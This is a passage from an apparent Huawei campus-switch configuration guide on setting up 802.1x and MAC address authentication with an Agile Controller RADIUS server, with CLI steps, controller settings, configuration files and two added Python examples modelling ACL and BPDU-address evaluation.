[SwitchC-radius-rd1] radius-server shared-key cipher Huawei@2014
[SwitchC-radius-rd1] quit

# Create an AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchC] aaa
[SwitchC-aaa] authentication-scheme abc
[SwitchC-aaa-authen-abc] authentication-mode radius
[SwitchC-aaa-authen-abc] quit

# Configure the accounting scheme acco1 and set the accounting mode to RADIUS.
[SwitchC-aaa] accounting-scheme acco1
[SwitchC-aaa-accounting-acco1] accounting-mode radius
[SwitchC-aaa-accounting-acco1] accounting realtime 15 //Set the real-time accounting interval to 15 minutes.
[SwitchC-aaa-accounting-acco1] quit

# Create an authentication domain isp, and bind the AAA authentication scheme abc,
accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchC-aaa] domain isp
[SwitchC-aaa-domain-isp] authentication-scheme abc
[SwitchC-aaa-domain-isp] accounting-scheme acco1
[SwitchC-aaa-domain-isp] radius-server rd1
[SwitchC-aaa-domain-isp] quit
[SwitchC-aaa] quit

# Configure isp as the global default domain. During access authentication, enter a user
name in the format user@isp to perform AAA authentication in the domain isp. If the
user name does not contain a domain name or contains an invalid domain name, the user
is authenticated in the default domain.
[SwitchC] domain isp

3. Enable 802.1x and MAC address authentication.

# Set the NAC mode to unified.
[SwitchC] authentication unified-mode

NOTE: By default, the unified mode is enabled. After the NAC mode is changed, save the configuration and
restart the device to make the configuration take effect.

# Enable 802.1x authentication on GE0/0/1.
[SwitchC] interface gigabitEthernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] authentication dot1x
[SwitchC-GigabitEthernet0/0/1] quit

# Enable MAC address authentication on GE0/0/2.
[SwitchC] interface gigabitEthernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] authentication mac-authen
[SwitchC-GigabitEthernet0/0/2] mac-authen username fixed A-123 password cipher Huawei123 //Set the user name mode for MAC address authentication to fixed user name. Set the user name to A-123 and password to Huawei123.
[SwitchC-GigabitEthernet0/0/2] quit

4. Configure ACL 3002 for the post-authentication domain.
[SwitchC] acl 3002
[SwitchC-acl-adv-3002] rule 1 permit ip destination 192.168.102.100 0
[SwitchC-acl-adv-3002] rule 2 deny ip destination any
[SwitchC-acl-adv-3002] quit
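As an added example (not Huawei's code), the following Python models how the ACLs and authentication-free rules in this section are evaluated: the pre-authentication domain of the preceding Portal example (free rules for the DNS and web servers, with the RADIUS server passed by default as the configuration notes state), its per-department ACLs 3001 and 3002, and the post-authentication ACL 3002 configured in step 4 above. Rule text and addresses are copied from the page; the sample source addresses are constructed, and the action for traffic that matches no rule is a parameter because every ACL on the page ends with an explicit catch-all rule.

```python
"""Evaluator for the Huawei-style advanced ACL rules and authentication
free-rules used in this section. Added example, not Huawei code: first-match
evaluation in rule-number order. The action for traffic matching no rule is
passed in explicitly, because the page's ACLs all end with a catch-all rule
and never rely on the device's implicit action."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Set


def ip_to_int(s: str) -> int:
    return int(ipaddress.IPv4Address(s))


@dataclass(frozen=True)
class Match:
    """Address plus wildcard: a 1 bit in the wildcard means 'do not care'."""
    addr: int
    wildcard: int

    def covers(self, ip: str) -> bool:
        return ((ip_to_int(ip) ^ self.addr) & ~self.wildcard & 0xFFFFFFFF) == 0


@dataclass(frozen=True)
class Rule:
    number: int
    action: str                   # "permit" or "deny"
    source: Optional[Match]       # None means any
    destination: Optional[Match]  # None means any

    def matches(self, src_ip: str, dst_ip: str) -> bool:
        return ((self.source is None or self.source.covers(src_ip)) and
                (self.destination is None or self.destination.covers(dst_ip)))


def _parse_match(tokens: List[str], i: int):
    """Parse 'any' or '<addr> <wildcard>' at tokens[i]; '0' is the device's
    shorthand for wildcard 0.0.0.0 (exact host). Returns (Match or None, next i)."""
    if i >= len(tokens):
        raise ValueError("address expected")
    if tokens[i] == "any":
        return None, i + 1
    if i + 1 >= len(tokens):
        raise ValueError("wildcard expected after " + tokens[i])
    wc = tokens[i + 1]
    return Match(ip_to_int(tokens[i]), 0 if wc == "0" else ip_to_int(wc)), i + 2


def parse_rule(line: str) -> Rule:
    """Parse 'rule N permit|deny ip [source A W|any] [destination B W|any]'."""
    t = line.split()
    if len(t) < 4 or t[0] != "rule" or t[2] not in ("permit", "deny") or t[3] != "ip":
        raise ValueError(f"unsupported rule: {line!r}")
    src = dst = None
    i = 4
    while i < len(t):
        if t[i] == "source":
            src, i = _parse_match(t, i + 1)
        elif t[i] == "destination":
            dst, i = _parse_match(t, i + 1)
        else:
            raise ValueError(f"unsupported keyword {t[i]!r} in {line!r}")
    return Rule(int(t[1]), t[2], src, dst)


def parse_acl(text: str) -> List[Rule]:
    """Collect the 'rule' lines of an ACL block, ordered by rule number (the
    order the device evaluates them in); the 'acl number' line is skipped."""
    rules = [parse_rule(l.strip()) for l in text.splitlines() if l.strip().startswith("rule ")]
    return sorted(rules, key=lambda r: r.number)


def evaluate(rules: List[Rule], src_ip: str, dst_ip: str, default: str = "deny") -> str:
    """First matching rule wins; `default` applies only when no rule matches."""
    for rule in rules:
        if rule.matches(src_ip, dst_ip):
            return rule.action
    return default


def parse_free_rule(line: str) -> Match:
    """'authentication free-rule N destination ip A mask M' carries a subnet
    mask, not a wildcard, so the mask is inverted to build the Match."""
    t = line.split()
    if len(t) != 8 or t[:2] != ["authentication", "free-rule"] or \
            t[3:5] != ["destination", "ip"] or t[6] != "mask":
        raise ValueError(f"unsupported free-rule: {line!r}")
    return Match(ip_to_int(t[5]), ~ip_to_int(t[7]) & 0xFFFFFFFF)


def reachable_before_auth(free_rules: List[Match], radius_servers: Set[str], dst_ip: str) -> bool:
    """Pre-authentication domain: free-rule destinations plus the RADIUS server,
    which the page says the switch passes without a free rule."""
    return dst_ip in radius_servers or any(m.covers(dst_ip) for m in free_rules)


# Rule text copied from this section's configuration files.
FREE_RULES = [parse_free_rule(l) for l in (
    "authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255",
    "authentication free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255")]
ACL_3001_RD = parse_acl("acl number 3001\nrule 1 permit ip")
ACL_3002_MARKETING = parse_acl("acl number 3002\nrule 1 deny ip destination 172.16.1.4 0\n"
                               "rule 2 deny ip destination 172.16.1.5 0\nrule 3 permit ip")
ACL_3002_POST_AUTH = parse_acl("acl number 3002\nrule 1 permit ip destination 192.168.102.100 0\n"
                               "rule 2 deny ip destination any")

if __name__ == "__main__":  # source addresses below are constructed
    print("pre-auth to DNS:", reachable_before_auth(FREE_RULES, {"172.16.1.1"}, "172.16.1.2"))
    print("R&D to 172.16.1.4:", evaluate(ACL_3001_RD, "192.168.0.10", "172.16.1.4"))
    print("marketing to 172.16.1.4:", evaluate(ACL_3002_MARKETING, "192.168.1.10", "172.16.1.4"))
    print("post-auth to 192.168.102.101:", evaluate(ACL_3002_POST_AUTH, "192.168.30.5", "192.168.102.101"))
```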

Step 2 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.

Address Format                     Description
https://Agile Controller-IP:8443   In the address, Agile Controller-IP indicates the Agile Controller IP address.
Agile Controller IP address        If port 80 is enabled during installation, you can access the Agile Controller by simply entering its IP address without the port number. The Agile Controller address will automatically change to https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create a department and account.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.

c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.


d. Click in the Operation column on the right of user A. The Account Management page is
displayed. Click Add, and create a common account A-123 with the password Huawei123.


e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.


3. Add switches to the Agile Controller so that the switches can communicate with the
Agile Controller.
a. Choose Resource > Device > Device Management.
b. Click Permission Control Device Group in the navigation tree, and click and
Add SubGroup to create a device group Switch.

c. Click the device group in the navigation tree and select ALL Device. Click Add to
add network access devices.
d. Set connection parameters on the Add Device page.
This example uses SwitchC to describe the configuration procedure. The
configuration on SwitchD is the same as that on SwitchC except that the IP
addresses are different.


Parameter                              Value                          Description
Name                                   SwitchC                        -
IP Address                             192.168.30.30                  The interface on the switch must communicate with the Agile Controller.
Device Series                          Huawei Quidway series switch   -
Authentication Key                     Huawei@2014                    It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key                           Huawei@2014                    It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute)   15                             It must be the same as the real-time accounting interval configured on the switch.


e. Click Permission Control Device Group in the navigation tree, select SwitchC,
and click Move to move SwitchC to the Switch group. The configuration on
SwitchD is the same as that on SwitchC.
4. Add an authentication rule.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authentication Rule and click Add to create an authentication rule.
b. Configure basic information for the authentication rule.
Parameter                                           Value                        Description
Name                                                Access authentication rule   -
Service Type                                        Access service               -
Authentication Condition                            Device group Switch          Customize authentication rules based on the requirements of your network.
Please select the allowed authentication protocol   EAP-PEAP-MSCHAPv2            -


5. Add an authorization result.


a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result and click Add to create an authorization result.
b. Configure basic information for the authorization result.
Parameter                   Value                        Description
Name                        Post-authentication domain   -
Service Type                Access service               -
ACL Number/AAA User Group   3002                         The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.


6. Add an authorization rule.

After a user passes the authentication, authorization phase starts. The Agile Controller
grants the user access rights based on the authorization rule.

a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule and click Add to create an authorization rule.
b. Configure basic information for the authorization rule.

Parameter              Value                                  Description
Name                   Authorization rule for R&D employees   -
Service Type           Access service                         -
Access Device Group    Switch                                 -
Authorization Result   Post-authentication domain             -


Step 3 Verify the configuration.


l An employee can only access the Agile Controller server before passing the
authentication.
l After passing the authentication, the employee can access resources in the post-
authentication domain.
l After the employee passes the authentication, run the display access-user command on
the switch. The command output shows information about the online employee.

----End


Switch Configuration File


#
sysname SwitchC
#
vlan batch 10
#
domain isp
#
radius-server template rd1
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%^%#
radius-server authentication 192.168.100.100 1812 weight 80
radius-server accounting 192.168.100.100 1813 weight 80
#
acl number 3002
rule 1 permit ip destination 192.168.102.100 0
rule 2 deny ip
#
aaa
authentication-scheme abc
authentication-mode radius
accounting-scheme acco1
accounting-mode radius
accounting realtime 15
domain isp
authentication-scheme abc
accounting-scheme acco1
radius-server rd1
#
interface Vlanif10
ip address 192.168.30.30 255.255.255.0
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 10
authentication dot1x
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 10
authentication mac-authen
mac-authen username fixed A-123 password cipher %^%#7JxKWaX6c0\X4RHfJ$M6|duQ*k{7uXu{J{S=zx-3%^%#
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 10
#
return

10.5.4 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch)
Overview
On a NAC network, the 802.1x, MAC address, and Portal authentication modes can be
configured on the user access interfaces of a device to meet various authentication
requirements. Users can access the network using any of the configured authentication modes.
If multiple authentication modes are enabled, they take effect in the sequence in which they
are configured. In addition, after multiple authentication modes are deployed, users can by
default be authenticated in different modes, and the device assigns them different network
rights accordingly.


Configuration Notes
l This example applies to all S12700 versions.
l NOTE: To know details about software mappings, see Version Mapping Search for Huawei Campus
Switches.
l Huawei's Agile Controller in V100R001C00 functions as the RADIUS server in this
example. For the Agile Controller, the minimum version required is V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows packets from the RADIUS server to pass. You do not need
to configure authentication-free rules for the server on the switch.
l If NAC authentication is enabled on an interface, the following commands cannot be
used on the same interface.

Command                             Function
mac-limit                           Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable        Disables MAC address learning on an interface.
port link-type dot1q-tunnel         Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan     Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                  Configures selective QinQ.
port-security enable                Enables interface security.
mac-vlan enable                     Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable               Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
Enterprises have high requirements on network security. To prevent unauthorized access and
protect information security, an enterprise requires users to pass identity authentication and
a security check before they access the enterprise network. Only authorized users are allowed to
access the enterprise network.

In addition, dumb terminals, such as IP phones and printers, can access the enterprise network
only after passing authentication.

The enterprise network has the following characteristics:

l The access switches on the network do not support 802.1x authentication.
l The enterprise network is small and has no branch networks.
l The enterprise has no more than 1000 employees. A maximum of 2000 users, including
guests, access the network every day.
l Dumb terminals, such as IP phones and printers, are connected to the enterprise network.

To reduce network reconstruction investment, you are advised to configure the 802.1x
authentication function on the aggregation switch and connect a single centralized
authentication server to the aggregation switch in bypass mode. MAC address authentication
needs to be configured for dumb terminals.

Figure 10-38 Wired access networking diagram

[Figure: pre-authentication domain: Agile Controller (Server: SM&SC&DB), 192.168.100.100; post-authentication domain: service server (key network resources), 192.168.102.100. Core layer with campus egress to the Internet. Aggregation layer: SwitchA (the authentication point in this example), upstream interfaces GE1/0/5 and GE1/0/6, downstream interfaces GE1/0/1 and GE1/0/2. Access layer: SwitchC and SwitchD, each with uplink GE0/0/3, a fixed terminal on GE0/0/1 and a dumb terminal on GE0/0/2. Legend: 802.1X authentication packets; MAC authentication packets.]

Data Plan

Table 10-12 Network data plan

Item                                Data
Agile Controller                    IP address: 192.168.100.100
Post-authentication domain server   IP address: 192.168.102.100
Aggregation switch (SwitchA)        VLAN to which GE1/0/6 (connected to the server) belongs: VLAN 100; VLAN to which downstream interfaces GE1/0/1 and GE1/0/2 belong: VLAN 200
Access switch (SwitchC)             User VLAN ID: 200
Access switch (SwitchD)             User VLAN ID: 200

Table 10-13 Aggregation switch service data plan

Item                                           Data
RADIUS scheme
    l Authentication server IP address: 192.168.100.100
    l Authentication server port number: 1812
    l Accounting server IP address: 192.168.100.100
    l Accounting server port number: 1813
    l Shared key for the RADIUS server: Huawei@2014
    l Accounting interval: 15 minutes
    l Authentication domain: isp
ACL number of the post-authentication domain   3002

Table 10-14 Agile Controller service data plan

Item                        Data
Department                  R&D department
Access user                 User name: A; wired access account: A-123; password: Huawei123
Device group                Wired device group: Switch
Switch IP address           SwitchA: 192.168.10.10
RADIUS authentication key   Huawei@2014
RADIUS accounting key       Huawei@2014

Configuration Roadmap
1. Configure the aggregation switch, including the VLANs that interfaces belong to, parameters
for connecting to the RADIUS server, enabling NAC authentication, and access rights to
the post-authentication domain.
NOTE: Ensure that routes are reachable between the access switches (SwitchC and SwitchD), the aggregation switch
(SwitchA), and the Agile Controller server.
2. Configure the access switches, including the VLANs and 802.1x transparent
transmission.


3. Configure the Agile Controller:


a. Log in to the Agile Controller.
b. Add an account to the Agile Controller.
c. Add switches to the Agile Controller.
d. Configure authentication rules, authorization results, and authorization rules on the
Agile Controller.

Procedure
Step 1 Configure the aggregation switch.
1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200
[SwitchA] interface gigabitethernet 1/0/1 //Configure the interface connected to SwitchC.
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 200
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2 //Configure the interface connected to SwitchD.
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/6 //Configure the interface connected to the server.
[SwitchA-GigabitEthernet1/0/6] port link-type trunk
[SwitchA-GigabitEthernet1/0/6] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet1/0/6] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 192.168.10.10 24 //Configure the management IP address for SwitchA. This IP address is used when SwitchA is added to Agile Controller.
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 192.168.200.1 24 //Configure the gateway address for terminal users.
[SwitchA-Vlanif200] quit
[SwitchA] ip route-static 192.168.100.0 255.255.255.0 192.168.10.10 //Configure a route to the network segment where the pre-authentication domain resides.
[SwitchA] ip route-static 192.168.102.0 255.255.255.0 192.168.10.10 //Configure a route to the network segment where the post-authentication domain resides.

2. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.
# Create and configure the RADIUS server template rd1.
[SwitchA] radius-server template rd1
[SwitchA-radius-rd1] radius-server authentication 192.168.100.100 1812
[SwitchA-radius-rd1] radius-server accounting 192.168.100.100 1813
[SwitchA-radius-rd1] radius-server shared-key cipher Huawei@2014
[SwitchA-radius-rd1] quit

# Create an AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchA] aaa
[SwitchA-aaa] authentication-scheme abc
[SwitchA-aaa-authen-abc] authentication-mode radius
[SwitchA-aaa-authen-abc] quit

# Configure an accounting scheme acco1. Set the accounting mode to RADIUS so that the RADIUS server can track account status, such as login, logoff, and forced logoff.
[SwitchA-aaa] accounting-scheme acco1
[SwitchA-aaa-accounting-acco1] accounting-mode radius
[SwitchA-aaa-accounting-acco1] accounting realtime 15 //Set the real-time
accounting interval to 15 minutes.
[SwitchA-aaa-accounting-acco1] quit

# Create an authentication domain isp, and bind the AAA authentication scheme abc,
accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchA-aaa] domain isp
[SwitchA-aaa-domain-isp] authentication-scheme abc
[SwitchA-aaa-domain-isp] accounting-scheme acco1
[SwitchA-aaa-domain-isp] radius-server rd1
[SwitchA-aaa-domain-isp] quit
[SwitchA-aaa] quit

# Configure the global default domain isp. During access authentication, enter a user
name in the format user@isp to perform AAA authentication in the domain isp. If the
user name does not contain a domain name or contains an invalid domain name, the user
is authenticated in the default domain.
[SwitchA] domain isp

3. Enable 802.1x and MAC address authentication.

# Set the NAC mode to unified.
[SwitchA] authentication unified-mode

NOTE
By default, the unified mode is enabled. After the NAC mode is changed, save the configuration and restart the device to make the configuration take effect.

# Enable 802.1x and MAC address authentication on GE1/0/1 and GE1/0/2.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] authentication dot1x mac-authen //Configure a combination of 802.1x and MAC address authentication.
[SwitchA-GigabitEthernet1/0/1] mac-authen username fixed A-123 password cipher Huawei123 //Set the user name mode for MAC address authentication to fixed user name. Set the user name to A-123 and the password to Huawei123.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] authentication dot1x mac-authen //Configure a combination of 802.1x and MAC address authentication.
[SwitchA-GigabitEthernet1/0/2] mac-authen username fixed A-123 password cipher Huawei123 //Set the user name mode for MAC address authentication to fixed user name. Set the user name to A-123 and the password to Huawei123.
[SwitchA-GigabitEthernet1/0/2] quit

4. Configure ACL 3002 for the post-authentication domain.


[SwitchA] acl 3002
[SwitchA-acl-adv-3002] rule 1 permit ip destination 192.168.102.100 0
[SwitchA-acl-adv-3002] rule 2 deny ip destination any
[SwitchA-acl-adv-3002] quit

Step 2 Configure the access switches.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded. This example uses SwitchC to describe the configuration. The configuration
on SwitchD is the same as that on SwitchC.

# Create VLAN 200.


<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] vlan batch 200

# Configure the interface connected to users as an access interface and add the interface
to VLAN 200.
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] port link-type access
[SwitchC-GigabitEthernet0/0/1] port default vlan 200
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] port link-type access
[SwitchC-GigabitEthernet0/0/2] port default vlan 200
[SwitchC-GigabitEthernet0/0/2] quit

# Configure the interface connected to the upstream network as a trunk interface and configure it to allow VLAN 200.
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] port link-type trunk
[SwitchC-GigabitEthernet0/0/3] port trunk allow-pass vlan 200
[SwitchC-GigabitEthernet0/0/3] quit

2. Configure the device to transparently transmit 802.1x packets. This example uses
SwitchC to describe the configuration. The configuration on SwitchD is the same as that
on SwitchC.
NOTE

In this example, SwitchC and SwitchD are deployed between the authentication switch SwitchA and
users. EAP packet transparent transmission needs to be configured on SwitchC and SwitchD so that
SwitchA can perform 802.1x authentication for users.
– Method 1:
[SwitchC] l2protocol-tunnel user-defined-protocol 802.1X protocol-mac 0180-c200-0003 group-mac 0100-0000-0002
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/1] bpdu enable
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/2] bpdu enable
[SwitchC-GigabitEthernet0/0/2] quit
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/3] bpdu enable
[SwitchC-GigabitEthernet0/0/3] quit

– Method 2: This method is recommended when a large number of users exist or high network performance is required.
[SwitchC] undo bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFF0
[SwitchC] bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
[SwitchC] bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
[SwitchC] bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
[SwitchC] bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8

The following step is mandatory when you switch from method 1 to method 2.
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] undo l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] undo l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/2] quit
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] undo l2protocol-tunnel user-defined-protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/3] quit
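The five bpdu mac-address entries in method 2 replace the single default entry with a set of address/mask pairs that leaves one hole in the 0180-c200-00xx block. The Python below is an added example (not code from the Huawei guide) that computes which addresses each entry set captures and shows that the only address released by method 2 is 0180-c200-0003, the 802.1X EAPOL PAE group address that method 1 names as protocol-mac, so EAPOL frames are forwarded as ordinary traffic instead of being trapped as BPDUs. It assumes the mask is a care mask (bits set in the mask must match the entry), which is the reading consistent with the default FFFF-FFFF-FFF0 entry covering 0180-c200-0000 to 0180-c200-000F.

```python
"""Added example: how the bpdu mac-address entries of method 2 partition the
0180-c200-00xx block. The entry lists are copied from the commands above; the
care-mask interpretation of the mask argument is an assumption."""


def mac_to_int(mac: str) -> int:
    """Parse a Huawei-style MAC ('0180-c200-0003') or a colon/dot form into an int."""
    hexdigits = mac.replace("-", "").replace(":", "").replace(".", "")
    if len(hexdigits) != 12:
        raise ValueError(f"bad MAC address: {mac}")
    return int(hexdigits, 16)


def int_to_mac(value: int) -> str:
    """Render an int as a Huawei-style MAC ('0180-c200-0003')."""
    h = f"{value:012x}"
    return f"{h[0:4]}-{h[4:8]}-{h[8:12]}"


def matches(dst_mac: str, entry_mac: str, mask: str) -> bool:
    """A frame hits an entry when the bits selected by the mask equal the entry's bits."""
    m = mac_to_int(mask)
    return (mac_to_int(dst_mac) & m) == (mac_to_int(entry_mac) & m)


def bpdu_set(entries, base: str = "0180-c200-0000", count: int = 16):
    """Addresses in base..base+count-1 that any (mac, mask) entry captures as a BPDU."""
    b = mac_to_int(base)
    return {
        int_to_mac(b + i)
        for i in range(count)
        if any(matches(int_to_mac(b + i), mac, mask) for mac, mask in entries)
    }


def released_addresses(before, after):
    """Addresses trapped under 'before' but forwarded normally under 'after'."""
    return sorted(bpdu_set(before) - bpdu_set(after))


# The default entry that method 2 removes with 'undo bpdu mac-address'.
DEFAULT_ENTRIES = [("0180-c200-0000", "FFFF-FFFF-FFF0")]

# The four entries method 2 adds.
METHOD2_ENTRIES = [
    ("0180-c200-0000", "FFFF-FFFF-FFFE"),  # 0000, 0001
    ("0180-c200-0002", "FFFF-FFFF-FFFF"),  # 0002 only
    ("0180-c200-0004", "FFFF-FFFF-FFFC"),  # 0004..0007
    ("0180-c200-0008", "FFFF-FFFF-FFF8"),  # 0008..000F
]

# 802.1X EAPOL PAE group address, the protocol-mac used in method 1.
EAPOL_PAE = "0180-c200-0003"


if __name__ == "__main__":
    print("trapped by default:", sorted(bpdu_set(DEFAULT_ENTRIES)))
    print("trapped by method 2:", sorted(bpdu_set(METHOD2_ENTRIES)))
    print("released by method 2:", released_addresses(DEFAULT_ENTRIES, METHOD2_ENTRIES))
```

Run as a script it lists both address sets; the useful check for a change review is that released_addresses returns exactly the EAPOL address and nothing else, so STP, LACP and the other reserved addresses keep being handled as BPDUs.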

Step 3 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open Internet Explorer, enter the Agile Controller address in the address box, and press Enter.
The following table provides two types of Agile Controller addresses.

Address Format | Description
https://Agile Controller-IP:8443 | In the address, Agile Controller-IP indicates the Agile Controller IP address.
Agile Controller IP address | If port 80 is enabled during installation, you can access the Agile Controller by simply entering its IP address without the port number. The Agile Controller address will automatically change to https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create a department and account.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.

c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.

d. Click the icon in the Operation column on the right of user A. The Account Management page is displayed. Click Add, and create a common account A-123 with the password Huawei123.

e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.

3. Add switches to the Agile Controller so that the switches can communicate with the
Agile Controller.
a. Choose Resource > Device > Device Management.
b. Click Permission Control Device Group in the navigation tree, click the icon next to it, and choose Add SubGroup to create a device group Switch.

c. Click the device group in the navigation tree and select ALL Device. Click Add to
add network access devices.
d. Set connection parameters on the Add Device page.

Parameter | Value | Description
Name | SwitchA | -
IP Address | 192.168.10.10 | The interface on the switch must communicate with the Agile Controller.
Device Series | Huawei Quidway series switch | -
Authentication Key | Huawei@2014 | It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key | Huawei@2014 | It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the real-time accounting interval configured on the switch.

e. Click Permission Control Device Group in the navigation tree, select SwitchC,
and click Move to move SwitchA to the Switch group. The configuration on
SwitchD is the same as that on SwitchC.
4. Add an authentication rule.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authentication Rule and click Add to create an authentication rule.
b. Configure basic information for the authentication rule.

Parameter | Value | Description
Name | Access authentication rule | -
Service Type | Access service | -
Authentication Condition | Device group Switch | Customize authentication rules based on the requirements of your network.
Please select the allowed authentication protocol | EAP-PEAP-MSCHAPv2 | -
5. Add an authorization result.


a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result and click Add to create an authorization result.
b. Configure basic information for the authorization result.
Parameter | Value | Description
Name | Post-authentication domain | -
Service Type | Access service | -
ACL Number/AAA User Group | 3002 | The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.

6. Add an authorization rule.

After a user passes the authentication, authorization phase starts. The Agile Controller
grants the user access rights based on the authorization rule.

a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule and click Add to create an authorization rule.
b. Configure basic information for the authorization rule.

Parameter | Value | Description
Name | Authorization rule for R&D employees | -
Service Type | Access service | -
Access Device Group | Switch | -
Authorization Result | Post-authentication domain | -

Step 4 Verify the configuration.


l An employee can only access the Agile Controller server before passing the
authentication.
l After passing the authentication, the employee can access resources in the post-
authentication domain.
l After the employee passes the authentication, run the display access-user command on
the switch. The command output shows information about the online employee.

----End

Configuration Files
l SwitchA configuration file
#
sysname SwitchA
#
vlan batch 100 200
#
domain isp
#
radius-server template rd1
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%^%#
radius-server authentication 192.168.100.100 1812 weight 80
radius-server accounting 192.168.100.100 1813 weight 80
#
acl number 3002
rule 1 permit ip destination 192.168.102.100 0
rule 2 deny ip
#
aaa
authentication-scheme abc
authentication-mode radius
accounting-scheme acco1
accounting-mode radius
accounting realtime 15
domain isp
authentication-scheme abc
accounting-scheme acco1
radius-server rd1
#
interface Vlanif100
ip address 192.168.10.10 255.255.255.0
#
interface Vlanif200
ip address 192.168.200.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 200
authentication dot1x mac-authen
mac-authen username fixed A-123 password cipher %^%#7JxKWaX6c0\X4RHfJ$M6|duQ*k{7uXu{J{S=zx-3%^%#
#
interface GigabitEthernet1/0/2
